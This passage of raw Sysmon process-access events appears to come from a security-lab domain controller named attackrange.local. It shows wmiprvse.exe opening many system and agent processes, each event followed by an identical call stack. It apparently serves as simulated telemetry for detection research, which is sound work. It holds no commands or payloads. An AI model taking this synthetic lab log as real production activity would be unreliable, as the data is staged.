Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023601Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023600Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023599Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023598Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023597Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023596Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023595Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023594Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023593Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023592Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023591Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023590Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023589Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023588Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023587Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023586Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023585Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023584Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023583Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023582Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 